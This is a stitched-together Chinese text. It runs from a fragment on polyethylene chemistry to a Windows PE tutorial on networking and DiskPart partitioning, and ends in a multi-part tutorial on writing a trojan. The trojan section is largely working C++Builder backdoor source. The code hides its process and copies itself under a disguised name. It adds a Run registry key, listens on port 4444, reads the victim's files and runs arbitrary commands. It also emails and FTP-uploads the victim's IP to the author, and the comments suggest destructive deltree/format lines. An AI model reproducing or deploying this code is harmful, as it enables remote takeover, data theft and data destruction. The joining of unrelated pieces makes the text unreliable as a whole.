)的加成反应和聚合反应,由重复的–CH2–单元连接而成的高聚合链。聚乙烯的性能取决于它的聚合方式;在中等压力(15-30大气压)有机化合物催化条件下进行Ziegler-Natta聚合而成的是高密度聚乙烯(HDPE)。这种条件下聚合的聚乙烯分子是线性的,且分子链很长,分子量高达几十万。如果是在高压力(100-300MPa),高温(190–210 C),过氧化物催化条件下自由基聚合,生产出的则是低密度聚乙烯(LDPE),它是支化结构的。聚乙烯不溶于水,吸水性很小,就是对一些化学溶剂,如甲苯、醋酸等,也只有在70℃以上温度时才略有溶解。但是微粒状的聚乙烯,可以在15℃~40℃之间随温度的变化熔化或凝固,温度升高时熔化,吸收热量;温度降低时凝固,放出热量。又因为它吸水量很小,不易潮湿,有绝缘性能,因此是很好的建筑材料。---------------------------------------------------------------------------------------Windows PEWindows PreInstallation Environment(Windows PE)直接从字面上翻译就是“Windows预安装环境”,微软在2002年7月22日发布,它的原文解释是:“Windows预安装环境(Windows PE)是带有限服务的最小Win32子系统,基于以保护模式运行的Windows XP Professional内核。它包括运行Windows安装程序及脚本、连接网络共享、自动化基本过程以及执行硬件验证所需的最小功能。”换句话说,你可把Windows PE看作是一个只拥有最少核心服务的Mini操作系统。微软推出这么一个操作系统当然是因为它拥有与众不同的系统功能,如果要用一句话来解释,我认为与 Win9X/2000/XP相比,Windows PE的主要不同点就是:它可以自定义制作自身的可启动副本,在保证你需要的核心服务的同时保持最小的操作系统体积,同时它又是标准的32位视窗API的系统平台。当然,现在这么说也许难以理解,没有关系,下面让我们来仔细研究它。Windows PE概览即使有刚才的解释,你一定还是对这个全新概念的Mini操作系统一头雾水,没关系,在这里我将演示一下其运行的全过程,相信看过之后你或许就会有大致的了解。大多数人获得的Windows PE光碟(包括我手上这张ISO镜像光碟)应该是一张“Windows XP OPK”CD,意思就是Windows XP OEM预安装工具包CD。实际上,Windows XP OPK CD是Windows PE 32位版本的一个可引导副本,也就是说,这张CD已经是个用Windows PE定义制作的操作系统了,我们可直接用它来引导系统。先看看这张CD的目录结构吧,总共有352MB,是不是有些大呢?其实由于这是个副本(至少包含了不少驱动程序),大小是由当时自定义制作决定的,若是Windows PE的32位非自定义版本,其在磁盘上的镜像大约为120MB。1引导Windows PE笔者考虑到网络环境等问题,主要的使用环境是VMware虚拟机和Virtual PC虚拟机,不过这两种虚拟机环境与实际PC环境几乎没有区别(就是说如果你不清楚虚拟机也没关系,就当是在真实PC上直接运行)。将BIOS中设置成光驱引导,并开始启动系统,当屏幕画面上出现“Press any key boot from cd”时,按任意键从光驱上的Windows PE引导启动。如果你的存储设备驱动不被支持,在启动时按下F6键可加载特殊设备的驱动。当启动到桌面时系统会做一些如调整分辨率的工作,最后打开默认的 CMD命令行解释工具,大家看看,是货真价实的图形操作环境哦。可以看到桌面上空空如也,不要指望可以拿鼠标点来点去,毕竟是个什么应用程序都没有安装;另外尽管光碟上带有的可执行的命令行工具有限,但明显可以自己添加,看看这是什么?没错,是我们最熟悉的扫雷游戏(现在知道题头所指了吧,呵呵),拿鼠标先玩玩吧,这是笔者从大家熟悉的WinXP操作系统中加入的(方法很简单,用ISO工具直接拷入刚才的镜像文件就可以了)。那么还是先回到CMD命令行工具中吧。默认的目录是\I386\system32\,输入命令行“dir exe /w”可查看有哪些可运行的程序。下面我们实际研究一下对个人用户有实际意义的Windows PE特性的操作。在光碟镜像中可同时看到32位和64位操作系统的工具,对于个人用户来讲,你可用它直接引导没有安装任何系统的机器,并在其上实现32位系统的许多功能,这在后面会一一道来。2Windows PE对网络的支持刚才dir时我们看到了ping命令,熟悉这个命令的读者应该都知道,只有安装了TCP/IP协议才能使用,那么不管三七二十一,先来ping自己试试吧,在CMD中键入“ping 127001”,回车搞定,显然是可ping通的,这证明TCP/IP协议确实已在运行。再试一试光碟上另一个命令IPConfig,键入运行,看到IP地址已经自动分配好了。既然网络确实已经连接,那让我们来实际操作使用吧(这里可能有不少从视窗系统开始接触计算机的朋友会对操作不知所措,其实并没有想象中那么困难,你可以在CMD中使用命令工具带“/?”参数来查询具体使用方法,如果你机器上本来就装有XP,那么在帮助中心查询就更方便了,多实验一下,掌握命令行以后你会发现方便很多)。现在我的物理机和虚拟机构成了一个虚拟网络,使用光碟镜像中的net命令,在虚拟机中键入“net view”查看已连接的服务器,这里显示的服务器“XQ-B6QAS26953 EC”,名字表示虚拟机已通过网络连接了我的物理机器。我的物理机器上有一个名为TUKU的文件夹已经共享,所以再键入“net use e:\XQ-B6QAS26953EC\TUKU”,意思是将物理机器上的共享目录TUKU镜像为虚拟机器上的E盘,成功后可在虚拟机里自由地访问共享目录,这时就可通过这个来做远程安装等工作。net命令还有不少参数,自己可以查阅并多加尝试,才可以发挥Windows PE强大的网络环境功能,如果只是简单地访问服务器,上面的两个命令参数基本足够了。不过这里要记住用Windows PE的机器可访问其他操作系统的机器,而逆操作是不能的,这是由于Windows PE本身的限制,我们后面再讲这个问题。事实说明,Windows PE启动后就可以使用网络环境。3利用Windows PE创建、删除、格式化和管理NTFS文件系统
分区对于个人用户来说这个功能很是实用和方便。但不少朋友在dir完以后就叫苦,怎么只有formatcom,没有fdisk啊,根本没办法
分区嘛。其实这是个误解,Windows XP中针对磁盘管理工作有专用的命令行工具DiskPartexe,它是一种文本模式命令解释程序,能让你通过使用脚本或从命令提示符直接输入来管理对象(磁盘、
分区或卷),Windows PE使用的当然也是DiskPart。在CMD模式下键入“diskpart”并回车进入DiskPart命令行解释。键入“list disk”,显示有两块硬盘,分别为磁盘0和磁盘1。键入“select disk=0”执行,意思是选择指定磁盘,并将焦点转移到此磁盘,接下来的操作就都是针对它的(后面的操作都是一样,在磁盘、
分区或卷上使用 DiskPart命令前,必须首先将对象列表,然后选择要给予焦点的对象,只有对象拥有焦点时,键入的任何DiskPart命令才对该对象进行操作)。键入“detail disk”可以查看磁盘0的细节信息,现在磁盘0整个是一个活动
分区C,格式为FAT32,容量为16G。下面我们以实际操作将磁盘0分为两个区,分别为 NTFS格式的8G主分区C和FAT32格式8G逻辑分区D,而将磁盘1整个转为FAT32格式的分区E来演示Windows PE对磁盘的管理操作:(1)执行“select disk=0”,将焦点转到磁盘0。执行“select partition 1”,将焦点转到磁盘0的分区活动C上面。(2)执行“delete partition”将原来的分区C删除。(3)执行“create partition primary size=8000”回车,在磁盘0上建立一个新的8000MB的主分区,焦点会自动转到新建立的分区上。(4)接着执行“create partition extended”回车,将磁盘0上剩余的磁盘空间建立为扩展分区。(5)完成上一步后再执行“create partition logic”回车,将刚建立的扩展分区创建为一个逻辑分区。(6)至此,我们就已经把原来一个活动分区C的磁盘0创建为有一个主分区和一个逻辑分区了,不过这两个分区还没有驱动器号,执行“select partition 1”将焦点转到主分区1,然后执行“assign letter=C”,将驱动器号C:分配给主分区。执行“active”回车将主分区设为活动使其可以引导系统。(7)接下来执行“select partition 3”将焦点转到逻辑分区,执行“assign”回车,意思是系统将下一个可用的驱动器号分配给逻辑分区,由于驱动器号D、E均被占用(D为磁盘1分区占用,E为光驱占用),所以系统将F分配给了逻辑分区。不过没关系,我们先不管驱动器号的顺序,到这里我们对磁盘0的操作就结束了,剩下的目标是将磁盘1的活动分区D转换为分区E。(8)执行“select disk 1”将焦点转到磁盘1,执行“select partition 1”将焦点转到活动分区D。(9)由于磁盘1的D分区是活动的主分区,所以设其驱动器号为E,显然是要将它重新建立为一个非主分区的驱动器,那么它就不会占据驱动器号D而将它让给磁盘0的逻辑分区了。执行“delete partition”删除原来分区D,执行“create partition extended”将磁盘1上所有的磁盘空间建立为扩展分区。(10)完成上步后再执行“create partition logic”将刚建立的扩展分区创建为一个逻辑分区。(11)最后执行“assign”自动分配驱动器号,系统仍然把D分配给了它(不过在机器重新启动后系统会自动调整将D分配给磁盘0的逻辑分区,磁盘1的逻辑分区会使用驱动器E,而光驱就顺延到F了,重启一次系统这些改变都会自动实现)。(12)现在我们对机器上硬盘的重新分区工作就结束了,执行“exit”退出DiskPart命令行解释工具,然后执行“format c: /fs:ntfs”,将刚才建立的DISK 0主分区格式化为NTFS文件格式的分区,同理执行“format d: /fs:fat32”、“format f: /fs:fat32”将分区D、F格式化,我们最终的操作就完成了。(13)完成后执行“exit”重新启动机器,可以再次进入“DiskPart”来查看分区情况是否正确。上面的操作基本包括了对磁盘的创建、删除、格式化和管理,如果你再仔细读读帮助说明,保证你在掌握它强大的功能以后不再想使用Fdisk去管理磁盘。实际上你如果在使用Windows XP,这些知识都非常实用。此外“DiskPart”工具最方便的地方是支持脚本,在这里就不详细说明了。上面我们已经将Windows PE特性的基本操作都实践了一下,应该可以体会到Windows PE对个人的方便之处,但是就像上文所说的那样,Windows PE只是有限功能的Mini操作系统,要正确使用Windows PE,当然也要了解它的一些限制。1为了防止将它用作盗版操作系统,在连续使用24小时后Windows PE将自动退出并重启。2你可从Windows PE计算机通过网络直接访问服务器和共享。但不能从网络上的另一个位置访问Windows PE计算机上的任何文件或文件夹。Windows PE通过TCP/IP及其上的NetBIOS获得到达文件服务器的网络连接,不支持其他方法(如IPX/SPX网络协议)。3因为涉及反盗版,所以只能从Windows XP Professional CD建立Windows PE的自定义版本。而不能从Windows XP Home Edition或Windows 2002 Server操作系统家族的任何成员建立。4Windows PE太大,不能放在软盘上。Windows PE仅包括可用Win32 API的子集(包括I/O(磁盘和网络)和核心Win32 API)。如果Win32下运行的服务基于Win32 API子集,则它在Windows PE是否可用需具体分析。这里不详细列出Windows PE不支持的API了,反正rundll32exe和shelldll等是不被支持的,想要在Windows PE下面玩Quake的朋友还是趁早放弃。Windows PE的作用不少朋友看到这儿无论是否有收获,肯定都会想Windows PE到底对自己有什么明确的作用,这里不妨总结一二。1方便易用的启动工具盘通过刚才的叙述,大家可以看出,Windows PE启动相当快捷,而且对启动环境要求不高;最可贵的是,虽然名为启动盘,其功能却几乎相当于安装了一个Windows XP的“命令行版本”——别忘了网络支持哦。因此,对于个人计算机用户,只要将其刻录在一张光碟上,便可放心地去解决初始化系统之类的问题;而对小型网络环境(如网吧等)用户来说,这一功能尤其实用。2有趣的硬盘使用功能自定义的Windows PE不仅可放到那些可移动存储设备如CD上,还可以放在硬盘上使用。因为许多朋友会认为将Windows PE的自定义版本放在硬盘上没有什么意义,其实不然。把Windows PE放在硬盘上应该是最为有趣的地方,且不说你的操作系统损坏无法进入的情况下启动硬盘上的Windows PE可以方便地修复,关键是由于Windows PE在硬盘上,所以在Windows PE环境下安装应用程序就有了可能。呵呵,撇开题外话不讲,这里看一下如何把自定义的Windows PE放到硬盘上吧(只能在硬盘上放置Windows PE的32位版本)。首先要安装恢复控制台:(1)将Windows XP Professional CD放在CD-ROM驱动器中,这里指定其为cd_drive。(2)在命令行CMD窗口中运行cd_drive\i386\winnt32exe /cmdcons。然后将Windows PE自定义可引导副本放置在硬盘上,如下操作:(1)在目标硬盘上,创建“C:\Minint”的目录(这里必须将目录命名为“Minint”)。(2)将Windows PE“根目录\i386”下的所有内容复制到C:\Minint。(3)从Windows PE根目录下将Winbomini复制到目标硬盘的根目录。(4)在目标硬盘上,将“C:\Cmdcons\txtsetupsif”的只读属性改为读/写。(5)在目标硬盘上,将“C:\Minint\txtsetupsif”复制到“C:\Cmdcons”进行覆盖。(6)重新启动目标计算机。在“引导”菜单上,选择引导到“命令控制台”,计算机将使用Windows PE引导。3Windows XP OPK CD的本职工作上面说了其实我们拿到的是Windows PE的一个可执行副本,即Windows XP OPK(Windows XP OEM预安装工具包)CD。从名字都知道它原来的本职工作是为了方便OEM工作的。如果你在Windows操作系统环境下打开光碟,它就会自动运行 Autorun为你的系统安装一个“Windows安装管理器”的工具包。利用它,你可以轻易制造出带有计算机厂商OEM标志的Windows安装镜像。虽然这是Windows XP OPK CD的主要本职工作,但显然对我们个人没什么意义,当然,如果你想把手上的Windows安装CD都打上自己独有的印记,并在朋友的机器上安装时炫一下,那么使用它是个好主意。当然自己的“印记”绝非OEM标志那么简单,实际上你还可任意设定Windows PE携带的软件,并可设置这些软件在Windows PE启动时运行;理想的情形下你甚至可以为自定义的Windows PE版本加上类似于Windows Explorer的图形外壳程序——要不怎么叫专为厂商OEM设计呢?木马是如何编写的(一) 特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在DosWindows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。 我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗先修改你的profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。 自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。 首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈难道你还给受害者传一个1兆多的动态链接库Msvbvm60dll吗? 启动C++Builder 50企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。 我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32DLL中的鸟函数了。 首先判断目标机的操作系统是Win9x还是WinNt:{DWORD dwVersion = GetVersion();// 得到操作系统的版本号if (dwVersion >= 0x80000000)// 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK LPREGISTERSERVICEPROCESS)(DWORD,DWORD); file://定义RegisterServiceProcess()函数的原型 HINSTANCE hDLL; LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; hDLL = LoadLibrary("KERNEL32"); file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32DLL lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess"); file://得到RegisterServiceProcess()函数的地址 lpRegisterServiceProcess(GetCurrentProcessId(),1); file://执行RegisterServiceProcess()函数,隐藏本进程 FreeLibrary(hDLL); file://卸载动态链接库 }} 这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:{ char TempPath[MAX_PATH];file://定义一个变量GetSystemDirectory(TempPath ,MAX_PATH);file://TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径SystemPath=AnsiString(TempPath);file://格式化TempPath字符串,使之成为能供编译器使用的样式CopyFile(ParamStr(0)c_str(), AnsiString(SystemPath+"\\Tapi32exe")c_str() ,FALSE);file://将自己拷贝到%System%目录下,并改名为Tapi32exe,伪装起来Registry=new TRegistry;file://定义一个TRegistry对象,准备修改注册表,这一步必不可少Registry->RootKey=HKEY_LOCAL_MACHINE;file://设置主键为HKEY_LOCAL_MACHINERegistry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之try { file://如果以下语句发生异常,跳至catch,以避免程序崩溃 if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32exe") Registry->WriteString("crossbow",SystemPath+"\\Tapi32exe"); file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32exe file://如果不是,就写入以上键值和内容 }catch() { file://如果有错误,什么也不做 }} 好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。 接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。 再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:{ FILE fp=NULL; char content; int times_of_try; char TempFile[MAX_PATH]; file://定义了一堆待会儿要用到的变量 sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369BAT"))c_str()); file://在%System%下建立一个文本文件Win369bat,作为临时文件使用 AnsiString temp=Socket->ReceiveText(); file://接收客户端(攻击者,也就是你自己)传来的数据} 好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexecbat和Configsys吧:{if(tempSubString(0,9)=="edit conf") file://如果接受到的字符串的前9个字符是“edit conf” { int number=tempLength(); file://得到字符串的长度 int file_name=atoi((tempSubString(11,1))c_str()); file://将第11个字符转换成integer型,存入file_name变量 file://为什么要取第11个字符,因为第10个字符是空格字符 content=(tempSubString(12,number-11)+'\n')c_str(); file://余下的字符串将被作为写入的内容写入目标文件 FILE fp=NULL; char filename[20]; chmod("c:\\autoexecbat",S_IREADS_IWRITE); chmod("c:\\configsys",S_IREADS_IWRITE); file://将两个目标文件的属性改为可读可写 if(file_name==1) sprintf(filename,"%s","c:\\autoexecbat"); file://如果第11个字符是1,就把Autoexecbat格式化 else if(file_name==2) sprintf(filename,"%s","c:\\configsys"); file://如果第11个字符是1,就把Configsys格式化 times_of_try=0; file://定义计数器 while(fp==NULL) { file://如果指针是空 fp=fopen(filename,"a+"); file://如果文件不存在,创建之;如果存在,准备在其后添加 file://如果出错,文件指针为空,这样就会重复 times_of_try=times_of_try+1; file://计数器加1 if(times_of_try>100) { file://如果已经试了100次了,仍未成功 Socket->SendText("Fail By Open File"); file://就发回“Fail By Open File”的错误信息 goto END; file://跳至END处 } } fwrite(content,sizeof(char),strlen(content),fp); file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?! fclose(fp); file://写完后关闭目标文件 Socket->SendText("Sucess"); file://然后发回“Success”的成功信息 }}上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲:{else if(tempSubString(0,3)=="dir") { file://如果前3个字符是“dir” int Read_Num; char CR_LF="\n"; int attrib; char filename; DIR dir; struct dirent ent; int number=tempLength(); file://得到字符串的长度 AnsiString Dir_Name=tempSubString(5,number-3); file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名 if(Dir_Name=="") { file://如果目录名为空 Socket->SendText("Fail By Open DIR's Name"); file://返回“Fail By Open DIR's Name”信息 goto END; file://跳到END } char dirname; dirname=Dir_Namec_str(); if ((dir = opendir(dirname)) == NULL) { file://如果打开目录出错 Socket->SendText("Fail by your DIR's name!"); file://返回“Fail By Your DIR's Name”信息 goto END; file://跳到END } times_of_try=0; while(fp==NULL) { file://如果指针是NULL fp=fopen(TempFile,"w+"); file://就创建system\Win369bat准备读和写;如果此文件已存在,则会被覆盖 times_of_try=times_of_try+1; file://计数器加1 if(times_of_try>100) { file://如果已经试了100次了,仍未成功(真有耐心!) Socket->SendText("Fail By Open File"); file://就发回“Fail By Open File”的错误信息 goto END; file://并跳到END处 } } while ((ent = readdir(dir)) != NULL) { file://如果访问目标目录成功 if((AnsiString(dirname))AnsiLastChar()!='\\') file://如果最后一个字符不是“\”,证明不是根目录 filename=(AnsiString(dirname)+"\\"+ent->d_name)c_str(); file://加上“\”字符后将指针指向目录流 else filename=(AnsiString(dirname)+ent->d_name)c_str(); file://如果是根目录,则不用加“\” attrib=_rtl_chmod(filename, 0); file://得到目标文件的访问属性 if (attrib & FA_RDONLY) file://“&”字符是比较前后两个变量,如果相同返回1,否则返回0 fwrite(" R",sizeof(char),3,fp); file://将目标文件属性设为只读 else fwrite(" ",sizeof(char),3,fp); file://失败则写入空格 if (attrib & FA_HIDDEN) fwrite("H",sizeof(char),1,fp); file://将目标文件属性设为隐藏 else fwrite(" ",sizeof(char),1,fp); file://失败则写入空格 if (attrib & FA_SYSTEM) fwrite("S",sizeof(char),1,fp); file://将目标文件属性设为系统 else fwrite(" ",sizeof(char),1,fp); file://失败则写入空格 if (attrib & FA_ARCH) fwrite("A",sizeof(char),1,fp); file://将目标文件属性设为普通 else fwrite(" ",sizeof(char),1,fp); file://失败则写入空格 if (attrib & FA_DIREC) fwrite(" <DIR> ",sizeof(char),9,fp); file://将目标文件属性设为目录 else fwrite(" ",sizeof(char),9,fp); file://失败则写入空格 fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp); file://将目录名写入目标文件 fwrite(CR_LF,1,1,fp); file://写入换行 } fclose(fp); file://关闭文件 closedir(dir); file://关闭目录 FILE fp1=NULL; times_of_try=0; while(fp1==NULL) { fp1=fopen(TempFile,"r"); file://打开Win369bat准备读 times_of_try=times_of_try+1; file://计数器加1 if(times_of_try>100) { file://如果已经试了100次了,仍未成功 Socket->SendText("Fail By Open File"); file://就发回“Fail By Open File”的错误信息 goto END; file://并跳到END处 } } AnsiString Return_Text=""; char temp_content[300]; for(int i=0;i<300;i++) temp_content[i]='\0'; file://定义的一个空数组 Read_Num=fread(temp_content,1,300,fp1); file://从目标文件中读入前300个字符 while(Read_Num==300) { Return_Text=Return_Text+temp_content; file://Return_Text变量加上刚才的300个字符 for(int i=0;i<300;i++) temp_content[i]='\0'; Read_Num=fread(temp_content,1,300,fp1); file://重复 }; Return_Text=Return_Text+temp_content; file://Return_Text变量加上刚才的300个字符 fclose(fp1); file://关闭目标文件 Socket->SendText(Return_Text); file://返回Return_Text变量的内容 }} 够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Clientexe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):{else if(tempSubString(0,4)=="type") { file://如果前4个字符是“type” int Read_Num; int number=tempLength(); AnsiString File_Name=tempSubString(6,number-4); file://将目标文件流存入File_Name变量中 times_of_try=0; while(fp==NULL) { fp=fopen(File_Namec_str(),"r"); file://打开目标文件准备读 times_of_try=times_of_try+1; file://计数器加1 if(times_of_try>100) { file://如果已试了100次了 Socket->SendText("Fail By Open File"); file://返回“Fail By Open File”的错误信息 goto END; file://跳到END } } AnsiString Return_Text=""; char temp_content[300]; for(int i=0;i<300;i++) temp_content[i]='\0'; file://定义一个空数组 Read_Num=fread(temp_content,1,300,fp); file://从目标文件中读入前300个字符 while(Read_Num==300) { Return_Text=Return_Text+temp_content; file://Return_Text的内容加上刚才的字符 for(int i=0;i<300;i++) temp_content[i]='\0'; Read_Num=fread(temp_content,1,300,fp); file://重复 }; Return_Text=Return_Text+temp_content; file://Return_Text的内容加上刚才的字符 fclose(fp); file://关闭目标文件 Socket->SendText(Return_Text); file://返回Return_Text的内容,即你查看文件的内容 }} 咳咳!累死了!还是来点轻松的吧操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystemh头文件中):{else if(temp=="open") { file://如果收到的temp的内容是“open” mciSendString("set cdaudio door open", NULL, 0, NULL); file://就弹出光驱的托盘 }else if(temp=="close") { file://如果收到的temp的内容是“close” mciSendString("Set cdaudio door closed wait", NULL, 0, NULL); file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^ }} 接着就是交换目标机的鼠标左右键,代码如下:{else if(temp=="swap") { SwapMouseButton(1); file://交换鼠标左右键,简单吧? }} 然后就是使目标机重新启动。但这里要区分WinNt和Win9xNT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:{else if(temp=="reboot") { file://如果收到的temp的内容是“temp” DWORD dwVersion = GetVersion(); file://得到操作系统的版本号 if (dwVersion < 0x80000000) { file://操作系统是WinNt,不是Win9x HANDLE hToken; TOKEN_PRIVILEGES tkp; file://定义变量 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken); file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌 file://GetCurrentProcess()函数的作用是得到本进程的句柄 LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkpPrivileges[0]Luid); file://LookupPrivilegeValue()的作用是修改进程的权限 tkpPrivilegeCount = 1; file://赋给本进程特权 tkpPrivileges[0]Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0); file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利 ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0); file://强行退出WinNt并重启 } else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0); file://强行退出Win9x并重启 }} 如果以上都不是,就让它在Dos窗口中执行传来的命令:{else { file://如果都不是 char CR_TF="\n"; times_of_try=0; while(fp==NULL) { fp=fopen(TempFile,"w+"); file://创建Win369bat,如果已存在就覆盖 times_of_try=times_of_try+1; file://计数器加1 if(times_of_try>100) { Socket->SendText("Fail By Open File"); file://返回“Fail By Open File”的信息 goto END; file://跳到END } } fwrite(tempc_str(),sizeof(char),strlen(tempc_str()),fp); file://写入欲执行的命令 fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp); file://写入换行符 fclose(fp); file://关闭Win369bat system(TempFile); file://执行Win369bat Socket->SendText("Success"); file://返回“Success”信息 }} 你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^ 到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续) 木马是如何编写的(三) 武汉 周侃 上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):{END:; Socket->Close(); file://关闭服务 ServerSocket1->Active =true; file://再次打开服务 if (NMSMTP1->Connected) NMSMTP1->Disconnect(); file://如果SMTP服务器已连接则断开 NMSMTP1->Host = "smtp163net"; file://选一个好用的SMTP服务器,如163、263、sina和btamail NMSMTP1->UserID = ""; file://你SMTP的ID try { NMSMTP1->Connect(); file://再次连接 } catch() { goto NextTime; file://跳到NextTime } NMSMTP1->PostMessage->FromAddress ="I don't know!"; file://受害者的Email地址 NMSMTP1->PostMessage->FromName = "Casualty"; file://受害者的名字 NMSMTP1->PostMessage->ToAddress->Text = "crossbow@8848net"; file://将信发到我的邮箱,这一步很关键 NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ; file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接 NMSMTP1->PostMessage->Subject = "Server Running Now!"; file://信的主题 NMSMTP1->SendMail(); file://发送! return; file://返回NextTime: NMFTP1->Host = "ftpgo163com"; file://你的FTP服务器的地址 NMFTP1->UserID = ""; file://你的用户ID NMFTP1->Port = 21; file://FTP端口号,一般为21 NMFTP1->Password = ""; file://你的FTP的密码 if(NMFTP1->Connected) NMFTP1->Disconnect(); file://如果已连接就断开 try { NMFTP1->Connect(); file://再连接 } catch() { return; file://返回 } AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP; file://受害者的IP地址 FILE Upload; Upload = fopen(NMFTP1->RemoteIPc_str(),"w+"); file://创建一个新文件准备写,如果已存在就覆盖 fwrite(SendToSitec_str(),sizeof(char),SendToSiteLength(),Upload); file://写入以上的SendToSite的内容 fclose(Upload); file://写完后关闭此文件 NMFTP1->RemoveDir("public_html"); file://删除public_html目录 NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP); file://上传!} 